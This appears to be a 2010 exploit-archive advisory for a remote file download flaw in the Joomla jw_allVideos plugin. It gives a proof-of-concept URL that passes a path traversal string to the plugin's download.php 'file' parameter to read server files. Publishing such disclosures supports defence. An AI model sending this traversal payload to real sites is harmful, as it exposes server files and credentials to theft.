[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla (Jw_allVideos) Remote File Download Vulnerability
# Published : 2010-02-14
# Author : Pouya Daneshmand
# Previous Title : Mambo com_akogallery Remote Sql Injection Vulnerability
# Next Title : Joomla com_videos Remote Sql Injection Vulnerability


#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Joomla (jw_allvideos Plugin)
# Version: 1.0
#################################################################
# Vulnerability Info:
# Type: Remote File Download
# Risk: Medium
#################################################################
# Vulnerability:
# http://site.com/plugins/content/jw_allvideos/includes/download.php?file=./../.../file.php
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
###################################################################